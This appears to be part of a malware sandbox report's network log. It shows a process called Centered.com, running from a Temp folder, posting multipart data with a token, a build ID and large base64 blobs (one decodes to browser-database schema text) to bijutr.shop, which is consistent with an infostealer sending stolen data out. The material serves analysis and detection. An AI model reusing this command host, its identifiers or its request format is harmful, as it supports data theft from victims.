                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:21 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:21 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      15192.168.2.749809188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:21 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----VSJ5XTJ5XBIE37Q1NOPP
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 142457
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:21 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 53 4a 35 58 54 4a 35 58 42 49 45 33 37 51 31 4e 4f 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 56 53 4a 35 58 54 4a 35 58 42 49 45 33 37 51 31 4e 4f 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 56 53 4a 35 58 54 4a 35 58 42 49 45 33 37 51 31 4e 4f 50 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------VSJ5XTJ5XBIE37Q1NOPPContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------VSJ5XTJ5XBIE37Q1NOPPContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------VSJ5XTJ5XBIE37Q1NOPPCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:21 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                      Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:21 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:23 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:23 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      16192.168.2.749810188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:22 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----ZCT0RQ16P8YM7QI589Z5
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 493
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:22 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 43 54 30 52 51 31 36 50 38 59 4d 37 51 49 35 38 39 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 54 30 52 51 31 36 50 38 59 4d 37 51 49 35 38 39 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 54 30 52 51 31 36 50 38 59 4d 37 51 49 35 38 39 5a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------ZCT0RQ16P8YM7QI589Z5Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------ZCT0RQ16P8YM7QI589Z5Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------ZCT0RQ16P8YM7QI589Z5Cont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:23 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:23 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      17192.168.2.749827188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DB1DBAIWTRQIE3E3OH4E
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 3165
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------DB1DBAIWTRQIE3E3OH4EContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------DB1DBAIWTRQIE3E3OH4EContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------DB1DBAIWTRQIE3E3OH4ECont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:30 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      18192.168.2.749839172.64.41.34432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:30 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                      CF-RAY: 8f8725df8db27c7c-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 14 00 04 8e fb 28 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom(c)


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      19192.168.2.749850172.64.41.34432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:30 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                      CF-RAY: 8f8725df8c208c12-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
